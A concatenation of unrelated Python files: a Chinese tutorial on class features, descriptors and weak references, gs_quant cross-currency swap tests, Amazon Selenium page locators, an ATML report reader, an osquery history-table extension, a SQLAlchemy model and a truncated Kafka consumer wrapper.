ABCMeta,abstractmethod @total_ordering class Shape(object): @abstractmethod def area(self): pass def __lt__(self, obj): print('in __lt__') if not isinstance(obj, Shape): raise TypeError('obj is not Shape') return self.area() < obj.area() def __eq__(self, obj): print('in __eq__') if not isinstance(obj, Shape): raise TypeError('obj is not Shape') return self.area() == obj.area() class Rectangle(Shape): def __init__(self,w,h): self.w = w self.h = h def area(self): return self.w * self.h class Circle(Shape): def __init__(self, r): self.r = r def area(self): return self.r ** 2 * 3.14 ''' def __le__(self, obj): return self < obj or self == obj def __gt__(self, obj): return not (self < obj or self == obj) ''' r1 = Rectangle(5,3) r2 = Rectangle(4,4) c1 = Circle(3) print(c1 <= r1 ) # r1.__lt__(r2) print(r1 > c1 ) # r1.__lt__(r2) print(r1 > 1) """ """ 7-6 如何使用描述符对实例属性做类型检查 实际案例: 在某项目中,我们实现了一些类,并希望能像静态类型语言那样(C、C++、Java),对它们的实例属性做类型检查 p = Person() p.name = 'Bob' # 必须是str p.age = 18 # 必须是int p.height = 1.83 # 必须是float 要求: 1.可以对实例变量名指定类型 2.赋予不正确类型时抛出异常 解决方案: 使用描述符来实现需要类型检查的属性,分别实现__get__、__set__、__delete__方法,在__set__内使用isinstance函数做类型检查 """ ''' class Attr(object): def __init__(self, name, type_): self.name = name self.type_ = type_ def __get__(self, instance, cls): return instance.__dict__[self.name] def __set__(self, instance, value): if not isinstance(value, self.type_): raise TypeError('expected an %s' % self.type_) instance.__dict__[self.name] = value def __delete__(self, instance): del instance.__dict__[self.name] class Person(object): name = Attr('name', str) age = Attr('age', int) height = Attr('height', float) p = Person() p.name = 'Bob' print(p.name) p.age = '17' ''' """ 7-7 如何在环状数据结构中管理内存 实际案例: 在python中,垃圾回收器通过引用计数来回收垃圾对象,但某些环状数据结构(树、图...),存在对象间的循环引用,比如树的父节点引用子节点,子节点也同时引用父节点,此时同时del掉引用父子节点,两个对象不能被立即回收 如何解决此类的内存管理问题? 解决方案: 使用标准库weakref,它可以创建一种能访问对象但不增加引用计数的对象 """ ''' class A(object): def __del__(self): print('in A.__del__') a = A() import sys a2 = a # 查看引用计数 print(sys.getrefcount(a) - 1) del a2 print(sys.getrefcount(a) - 1) a = 5 # 当计数变为0,调用__del__方法 ''' """ class Data(object): def __init__(self, value, owner): self.owner = owner self.value = value def __str__(self): return "%s's data, value is %s" %(self.owner,self.value) def __del__(self): print('in Data.__del__') class Node(object): def __int__(self,value): self.data = Data(value, self) def __del__(self): print('in node.__del__') node = Node() import gc gc.collect() input('wait....') """ ''' class A(object): def __del__(self): print('in A.__del__') a = A() import sys print(sys.getrefcount(a) - 1) import weakref a_wref = weakref.ref(a) a2 = a_wref() print(a is a2) print(sys.getrefcount(a) - 1) del a del a2 print(a_wref()) print(a_wref() is None) ''' ''' import weakref class Data(object): def __init__(self, value, owner): self.owner = weakref.ref(owner) self.value = value def __str__(self): return "%s's data, value is %s" % (self.owner(), self.value) def __del__(self): print('in Data.__del__') class Node(object): def __int__(self, value): self.data = Data(value, self) def __del__(self): print('in node.__del__') node = Node() del node input('wait...') ''' ''' 7-8 如何通过实例方法名字的字符串调用方法 实际案例: 某项目中,我们的代码使用了3个不同库中的图形类:Circle、Triangle、Rectangle,他们都有一个获取图形面积的接口(方法),但接口名字不同,我们可以实现一个统一的获取面积的函数,使用每种方法名进行尝试,调用相应类的接口 解决方案: 方法1:使用内置函数getattr,通过名字在实例上获取方法对象,然后调用 方法2:使用标准库operator下的methodcaller函数调用 ''' ''' class Circle(object): def __init__(self,r): self.r = r def area(self): return self.r ** 2 * 3.14 class Rectangle(object): def __init__(self,w,h): self.w = w self.h = h def get_area(self): return self.w * self.h class Triangle(object): def __init__(self, a, b, c): self.a = a self.b = b def getArea(self): a, b, c = self.a,self.b,self.c p = (a + b + c) / 2 area = (p * (p - a) * (p - b) * (p - c)) ** 0.5 return area def getArea(shape): for name in ('area','getArea','get_area'): f = getattr(shape, name, None) if f: return f() shape1 = Circle(2) shape2 = Triangle(3, 4, 5) shape3 = Rectangle(6, 4) shapes = [shape1,shape2,shape3] print(map(getArea,shapes)) ''' """ from operator import methodcaller s = 'abc123abc456' print(s.find('abc',4)) print(methodcaller('find','abc',4)) print(methodcaller('find','abc',4)(s)) """ <filename>gs_quant/test/timeseries/test_measures_xccy.py """ Copyright 2020 <NAME>. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import datetime as dt import pandas as pd import pytest from pandas.testing import assert_series_equal from testfixtures import Replacer from testfixtures.mock import Mock import gs_quant.timeseries.measures_xccy as tm import gs_quant.timeseries.measures as tm_rates from gs_quant.api.gs.assets import GsAsset from gs_quant.api.gs.data import GsDataApi, MarketDataResponseFrame from gs_quant.errors import MqError, MqValueError from gs_quant.session import GsSession, Environment from gs_quant.target.common import PricingLocation, Currency as CurrEnum from gs_quant.test.timeseries.utils import mock_request from gs_quant.timeseries import Currency, Cross, Bond, CurrencyEnum, SecurityMaster from gs_quant.timeseries.measures_xccy import _currency_to_tdapi_crosscurrency_swap_rate_asset, \ CROSSCURRENCY_RATES_DEFAULTS, TdapiCrossCurrencyRatesDefaultsProvider _index = [pd.Timestamp('2021-03-30')] _test_datasets = ('TEST_DATASET',) def test_get_floating_rate_option_for_benchmark_retuns_rate(): provider = TdapiCrossCurrencyRatesDefaultsProvider(CROSSCURRENCY_RATES_DEFAULTS) value = provider.get_rateoption_for_benchmark(CurrencyEnum.GBP, "LIBOR") assert value == "GBP-LIBOR-BBA" def test_get_floating_rate_option_for_benchmark_retuns_rate_usd(): provider = TdapiCrossCurrencyRatesDefaultsProvider(CROSSCURRENCY_RATES_DEFAULTS) value = provider.get_rateoption_for_benchmark(CurrencyEnum.USD, "LIBOR") assert value == "USD-LIBOR-BBA" def test_currency_to_tdapi_xccy_swap_rate_asset(mocker): replace = Replacer() mocker.patch.object(GsSession.__class__, 'current', return_value=GsSession.get(Environment.QA, 'client_id', 'secret')) mocker.patch.object(GsSession.current, '_get', side_effect=mock_request) mocker.patch.object(SecurityMaster, 'get_asset', side_effect=mock_request) bbid_mock = replace('gs_quant.timeseries.measures_xccy.Asset.get_identifier', Mock()) with tm_rates.PricingContext(dt.date.today()): cur = [ { "currency_assetId": "MAK1FHKH5P5GJSHH", "currency": "JPY", "xccy_id": "MAFMW4HJC5TDE51H" }, { "currency_assetId": "MA66CZBQJST05XKG", "currency": "GBP", "xccy_id": "MATDD783JM1C2GGD" }, { "currency_assetId": "MAJNQPFGN1EBDHAE", "currency": "EUR", "xccy_id": "MAW8SAXPSKYA94E2" }, ] for c in cur: print(c) asset = Currency(c.get("currency_assetId"), c.get("currency")) bbid_mock.return_value = c.get("currency") mqid = _currency_to_tdapi_crosscurrency_swap_rate_asset(asset) assert mqid == c.get("xccy_id") bbid_mock.return_value = None assert _currency_to_tdapi_crosscurrency_swap_rate_asset(asset) == c.get("currency_assetId") replace.restore() def test_get_crosscurrency_swap_leg_defaults(): result_dict = dict(currency=CurrEnum.JPY, rateOption="JPY-LIBOR-BBA", designatedMaturity="3m", pricing_location=PricingLocation.TKO) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.JPY, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.EUR, rateOption="EUR-EURIBOR-TELERATE", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.EUR, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.EUR, rateOption="EUR-EONIA-OIS-COMPOUND", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.EUR, tm.CrossCurrencyRateOptionType.OIS) assert result_dict == defaults result_dict = dict(currency=CurrEnum.GBP, rateOption="GBP-LIBOR-BBA", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.GBP, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.GBP, rateOption="GBP-LIBOR-BBA", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.GBP, None) assert result_dict == defaults def test_get_crosscurrency_swap_csa_terms(): valid_ccy = ['EUR', 'GBP', 'JPY'] for ccy in valid_ccy: assert dict(csaTerms=ccy + '-1') == \ tm._get_crosscurrency_swap_csa_terms(ccy, tm.CrossCurrencyRateOptionType.LIBOR.value) def test_check_valid_indices(): valid_indices = ['LIBOR'] for index in valid_indices: assert tm.CrossCurrencyRateOptionType[index] == tm._check_crosscurrency_rateoption_type(CurrencyEnum.GBP, index) invalid_indices = ['LIBORED', 'TestRateOption'] for index in invalid_indices: with pytest.raises(MqError): tm._check_crosscurrency_rateoption_type(CurrencyEnum.GBP, index) def test_get_tdapi_crosscurrency_rates_assets(mocker): mock_asset_1 = GsAsset(asset_class='Rate', id='MAW8SAXPSKYA94E2', type_='XccySwapMTM', name='Test_asset') mock_asset_2 = GsAsset(asset_class='Rate', id='MATDD783JM1C2GGD', type_='XccySwapMTM', name='Test_asset') replace = Replacer() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1] assert 'MAW8SAXPSKYA94E2' == tm._get_tdapi_crosscurrency_rates_assets() replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1, mock_asset_2] kwargs = dict(asset_parameters_termination_date='5y', asset_parameters_effective_date='0b') with pytest.raises(MqValueError): tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [] kwargs = dict(asset_parameters_clearing_house='NONE', asset_parameters_payer_rate_option="EUR-EURIBOR-TELERATE", asset_parameters_payer_currency='EUR', asset_parameters_payer_designated_maturity='3m', asset_parameters_receiver_rate_option="USD-LIBOR-BBA", asset_parameters_receiver_currency='USD', asset_parameters_receiver_designated_maturity='3m', pricing_location='LDN') with pytest.raises(MqValueError): tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1, mock_asset_2] kwargs = dict() assert ['MAW8SAXPSKYA94E2', 'MATDD783JM1C2GGD'] == tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() # test case will test matching sofr maturity with libor leg and flipping legs to get right asset kwargs = dict(type='XccySwapMTM', asset_parameters_termination_date='5y', asset_parameters_payer_rate_option="EUR-EURIBOR-TELERATE", asset_parameters_payer_currency="EUR", asset_parameters_payer_designated_maturity='3m', asset_parameters_receiver_rate_option="USD-LIBOR-BBA", asset_parameters_receiver_currency="USD", asset_parameters_receiver_designated_maturity='3m', asset_parameters_clearing_house='None', asset_parameters_effective_date='5y', pricing_location='LDN') assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1] assert 'MAW8SAXPSKYA94E2' == tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() def mock_curr(_cls, _q): d = { 'xccySwapSpread': [1, 2, 3], } df = MarketDataResponseFrame(data=d, index=_index * 3) df.dataset_ids = _test_datasets return df def test_crosscurrency_swap_rate(mocker): replace = Replacer() args = dict(swap_tenor='5y', rateoption_type='LIBOR', clearing_house='LCH', forward_tenor='5y', real_time=False) mock_gbp = Currency('MA26QSMPX9990G66', 'GBP') args['asset'] = mock_gbp xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' xrefs = replace('gs_quant.timeseries.measures.SecurityMaster.get_asset', Mock()) mock_usd = Currency('MA26QSMPX9990G63', 'USD') xrefs.return_value = mock_usd args['swap_tenor'] = '5yr' with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['swap_tenor'] = '5y' args['forward_tenor'] = '5yr' with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['forward_tenor'] = '5y' args['real_time'] = True with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['real_time'] = False args['asset'] = Currency('MA666', 'AED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'AED' with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = mock_gbp args['asset'] = Bond('MA667', 'TEST') with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['asset'] = mock_gbp args['asset'] = Cross('MA667', 'USDAED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.side_effect = ['AED', 'USD'] with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = Cross('MA667', 'USDAED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.side_effect = ['USD', 'AED'] with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = Cross('MA667', 'USDGBP') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' xrefs = replace('gs_quant.timeseries.measures_xccy._check_crosscurrency_rateoption_type', Mock()) xrefs.side_effect = [tm.CrossCurrencyRateOptionType.LIBOR, tm.CrossCurrencyRateOptionType.OIS] with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) replace.restore() xrefs = replace('gs_quant.timeseries.measures.SecurityMaster.get_asset', Mock()) xrefs.return_value = mock_usd args['asset'] = Cross('MA667', 'USDGBP') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets args['asset'] = Cross('MA667', 'USDCAD') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'CAD' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets args['asset'] = mock_gbp xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' args['rateoption_type'] = tm.CrossCurrencyRateOptionType.TestRateOption with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['rateoption_type'] = tm.CrossCurrencyRateOptionType.LIBOR xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'EUR' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MAZBW57ZPS54ET7K'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) args['asset'] = Currency('MAZBW57ZPS54ET7K', 'EUR') args['rateoption_type'] = 'OIS' actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets replace.restore() if __name__ == '__main__': pytest.main(args=["test_measures_xccy.py"]) from selenium.webdriver.common.by import By class MainPageLocators: LOGO_URL = 'https://www.amazon.com/ref=nav_logo' LOGO = (By.ID, "nav-logo-sprites") # The hrefs below in the first small images when page loads DESKTOP_GRID_1 = (By.XPATH, "//*[@id='desktop-grid-1']/div/div[3]/a") DESKTOP_GRID_2 = (By.XPATH, "//*[@id='desktop-grid-2']/div/div[3]/a") DESKTOP_GRID_3 = (By.XPATH, "//*[@id='desktop-grid-3']/div/div[3]/a") DESKTOP_GRID_4 = (By.XPATH, "//*[@id='desktop-grid-4']/div/div[3]/a") DESKTOP_GRID_5 = (By.XPATH, "//*[@id='desktop-grid-5']/div/div[3]/a") DESKTOP_GRID_6 = (By.XPATH, "//*[@id='desktop-grid-6']/div/div[3]/a") DESKTOP_GRID_7 = (By.XPATH, "//*[@id='desktop-grid-7']/div/div[3]/a") DESKTOP_GRID_1_D2 = (By.CSS_SELECTOR, "img[alt='We ship 45 million products around the world']") # The hrefs below in the 4 small images in the middle DESKTOP_BTF_GRID_1 = (By.XPATH, "//*[@id='desktop-btf-grid-1']/div/div[3]/a") DESKTOP_BTF_GRID_2 = (By.XPATH, "//*[@id='desktop-btf-grid-2']/div/div[3]/a") DESKTOP_BTF_GRID_3 = (By.XPATH, "//*[@id='desktop-btf-grid-3']/div/div[3]/a") DESKTOP_BTF_GRID_4 = (By.XPATH, "//*[@id='desktop-btf-grid-4']/div/div[3]/a") # Top title text in the first 7 small img when page loads TITLE_GRID_1 = (By.XPATH, "//*[@id='desktop-grid-1']/div/div[1]/h2") TITLE_GRID_2 = (By.XPATH, "//*[@id='desktop-grid-2']/div/div[1]/h2") TITLE_GRID_3 = (By.XPATH, "//*[@id='desktop-grid-3']/div/div[1]/h2") TITLE_GRID_4 = (By.XPATH, "//*[@id='desktop-grid-4']/div/div[1]/h2") TITLE_GRID_5 = (By.XPATH, "//*[@id='desktop-grid-5']/div/div[1]/h2") TITLE_GRID_6 = (By.XPATH, "//*[@id='desktop-grid-6']/div/div[1]/h2") TITLE_GRID_7 = (By.XPATH, "//*[@id='desktop-grid-7']/div/div[1]/h2") # Category titles after clicking hrefs at the top of the page TITLE_AMAZONBASIC = (By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") TITLE_SHOP_BY_CAT = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_ELECTRONICS = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_COMPUTERS_ACCESSORIES = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_SHOP_TOP = (By.CSS_SELECTOR, "img[alt='Shop top categories']") TITLE_BEUATY_PICKS = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_GET_FIT = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_DEALS_PROM = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_EASY_RETURNS = (By.XPATH, "/html/body/div[2]/div[2]/div[1]/div/div[3]/h1") TITLE_SHIPS_WORLDWIDE = (By.XPATH, "//*[@id='a-page']/div[2]/div/div/div/div/div/div/div/div[3]/div[1]/div[2]/div/h1") TITLE_IDEAL_TV = (By.XPATH, "//*[@id='departments']/ul/li[2]/span/a/span[2]") # Category titles after clicking hrefs at the middle of the page TITLE_COMFY_STYLES = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_LAPTOP_TABLETS = (By.XPATH, "//*[@id='departments']/ul/li[2]/span/span") TITLE_HOME_BEDDING = (By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") TITLE_STRIP_LIGHTS = (By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") BACK_TO_TOP = (By.ID, "navBackToTop") # Button at the bottom LOGO_BOTTOM = (By.XPATH, "//*[@id='navFooter']/div[3]/span[1]/div/a/div") LANG_CHANGE = (By.CSS_SELECTOR, "img[alt='Shop in 8 different languages']") class LangPageLocators: ENGLISH_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[1]/div/label") ESPANOL_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[2]/div/label") DEUTSCH_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[4]/div/label") PORTUGUES_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[5]/div/label") TEXT_BOX = (By.ID, "icp-sl-t-text") # Text box on the right CURRENCY_SET = (By.ID, "a-autoid-0-announce") CURRENCY_TEXT = (By.ID, "icp-sc-note") # Text box on the bottom USD = (By.ID, "icp-sc-dropdown_1") ARS = (By.ID, "icp-sc-dropdown_3") EURO = (By.ID, "icp-sc-dropdown_23") HONG_KONG = (By.ID, "icp-sc-dropdown_27") NOK = (By.ID, "icp-sc-dropdown_46") POUNDS = (By.ID, "icp-sc-dropdown_51") VND = (By.ID, "icp-sc-dropdown_64") CANCEL_BUTTON = (By.ID, "icp-btn-close-announce") class RegisterPageLocators: DROP_MENU = (By.ID, "nav-link-accountList") # Navbar on the home page SIGN_UP = (By.XPATH, "//*[@id='nav-flyout-ya-newCust']/a") CREATE_ACC_BUTTON = (By.ID, "continue") NAME_ALERT = (By.XPATH, "//*[@id='auth-customerName-missing-alert']/div/div") EMAIL_ALERT = (By.XPATH, "//*[@id='auth-email-missing-alert']/div/div") INVALID_EMAIL_ALERT = (By.XPATH, "//*[@id='auth-email-invalid-email-alert']/div/div") PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-missing-alert']/div/div") SHORT_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-invalid-password-alert']/div/div") RE_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-passwordCheck-missing-alert']/div/div") MISMATCH_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-mismatch-alert']/div/div") NAME_INPUT = (By.ID, "ap_customer_name") EMAIL_INPUT = (By.ID, "ap_email") PASSWORD_INPUT = (By.ID, "<PASSWORD>") RE_PASSWORD_INPUT = (By.ID, "<PASSWORD>") BOX_PROBLEM_ALERT = (By.XPATH, "//*[@id='auth-error-message-box']/div/h4") # Placeholders are empty ; fill invalid email ; fill one password placeholder or different passwords BOX_NAME_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[1]/span") BOX_EMAIL_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[2]/span") BOX_PASSWORD_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[3]/span") # Name placeholder is fill BOX_EMAIL_ALERT_1 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[1]/span") BOX_PASSWORD_ALERT_1 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[2]/span") class LoginPageLocators: SIGN_IN = (By.XPATH, "//*[@id='nav-flyout-ya-signin']/a") EMAIL_PHONE_INPUT = (By.ID, "ap_email") EMPTY_EMAIL_PHONE = (By.XPATH, "//*[@id='auth-email-missing-alert']/div/div") EMAIL_PHONE_ALERT = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/ul/li/span") CONTINUE_BUTTON = (By.ID, "continue") CREATE_ACC_BUTTON = (By.ID, "createAccountSubmit") NEED_HELP_LINK = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div[1]/form/div/div/div/div[3]/div/a/span") FORGOT_PASS_LINK = (By.ID, "auth-fpp-link-bottom") OTHER_ISSUES_LINK = (By.ID, "ap-other-signin-issues-link") VALID_EMAIL = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div/div/div/span") FORGOT_PASS_SITE = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div[1]/div/form/h1") OTHER_ISSUES_SITE = (By.XPATH, "//*[@id='a-page']/div[2]/div[1]/h1") CREATE_ACC_SITE = (By.XPATH, "//*[@id='ap_register_form']/div/div/h1") import xml.etree.ElementTree as et import json import subprocess import pathlib import os try: from AtmlReader.AtmlTestResults import AtmlTestResults except: from AtmlTestResults import AtmlTestResults class AtmlFile(object): def __init__(self, file_path): file_handle = None root = None namespace_dict = {"trc":"urn:IEEE-1636.1:2011:01:TestResultsCollection", "tr":"urn:IEEE-1636.1:2011:01:TestResults", "c":"urn:IEEE-1671:2010:Common", "xsi":"http://www.w3.org/2001/XMLSchema-instance", "ts":"www.ni.com/TestStand/ATMLTestResults/2.0"} file_handle = open(file_path, encoding="utf8") root = et.fromstring(file_handle.read()) self.test_results = AtmlTestResults(root, namespace_dict) if file_handle != None: file_handle.close() def to_json(self): return f'{{ "testResults": {self.test_results.to_json()} }}' def __repr__(self): return self.to_json() if __name__ == "__main__": atml_file_path = r'C:\repos\battery-tester\Cycle Test\Battery Cycle Test_Report[3 22 37 PM][2 5 2020].xml' atml_file = AtmlFile(atml_file_path) atml_file_string = atml_file.to_json() with open(r'C:\Users\rfriedma\AppData\Local\Temp\atml_file.json', 'w') as f: f.write(atml_file_string) atml_json = json.loads(atml_file_string) <reponame>devborz/osquery_extension import json import osquery from os.path import expanduser @osquery.register_plugin class FilesystemHistoryTablePlugin(osquery.TablePlugin): def name(self): return "filesystem_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Path", type=osquery.STRING), osquery.TableColumn(name="Filename", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home+'/fs_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Path"] = item['path'] row["Filename"] = item['filename'] query_data.append(row) return query_data @osquery.register_plugin class BashHistoryTablePlugin(osquery.TablePlugin): def name(self): return "bash_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Execute directory", type=osquery.STRING), osquery.TableColumn(name="Command", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/bash_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Execute directory"] = item['path'] row["Command"] = item['command'] query_data.append(row) return query_data @osquery.register_plugin class VimCommandlineHistoryTablePlugin(osquery.TablePlugin): def name(self): return "vim_commandline_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Command", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/vim_cmd_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Command"] = item['command'] query_data.append(row) return query_data @osquery.register_plugin class vimFileMarksHistoryTablePlugin(osquery.TablePlugin): def name(self): return "vim_filemarks_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="File's path", type=osquery.STRING), osquery.TableColumn(name="Filename", type=osquery.STRING), osquery.TableColumn(name="Position row", type=osquery.STRING), osquery.TableColumn(name="Position column", type=osquery.STRING) ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/vim_fm_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["File's path"] = item['path'] row["Filename"] = item['filename'] row["Position row"] = item['row'] row["Position column"] = item['column'] query_data.append(row) return query_data if __name__ == "__main__": osquery.start_extension(name="history", version="1.0.0") <filename>src/modelo/album.py import enum from sqlalchemy import Column, Integer, String, Enum from sqlalchemy.orm import relationship from .declarative_base import Base class Medio(enum.Enum): DISCO = 1 CASETE = 2 CD = 3 class Album(Base): __tablename__ = 'album' id = Column(Integer, primary_key=True) titulo = Column(String) ano = Column(Integer) descripcion = Column(String) medio = Column(Enum(Medio)) canciones = relationship('Cancion', secondary='album_cancion', back_populates="albumes") import confluent_kafka import logging from confluent_kafka import Consumer from typing import Any, List, Optional, Union _logger = logging.getLogger(__name__) DEFAULT_QUEUED_MAX_MESSAGES_KBYTES = 10000 class KafkaMessageWrapper: def __init__(self, raw_msg: confluent_kafka.cimpl.Message): assert raw_msg is not None, "Raw message cannot be None." self._raw_msg = raw_msg def value(self) -> Union[str, bytes, bytearray]: return self._raw_msg.value() def topic(self) -> str: return self._raw_msg.topic() def partition(self) -> int: return self._raw_msg.partition() def offset(self) -> int: return self._raw_msg.offset() class KafkaConsumer: """ A wrapper for a Kafka Consumer. Currently uses the confluent kafka implementation. Future Note: As this project is supposed to run on Raspberry Pi (which I have not yet had time to test) we may need to switch this to use the python kafka library: https://github.com/dpkp/kafka-python As this is implemented natively in Python it may represent a lower hurdle for getting this application running on a pi. """ def __init__( self, id: str, topics: List[str], brokers: str, offset_reset_to_latest: bool = True, ): consumer_config = { "bootstrap.servers": brokers, "group.id": "scrapworker-" + id, "auto.offset.reset": "latest" if offset_reset_to_latest else "earliest", "enable.auto.commit": False, "queued.max.messages.kbytes": 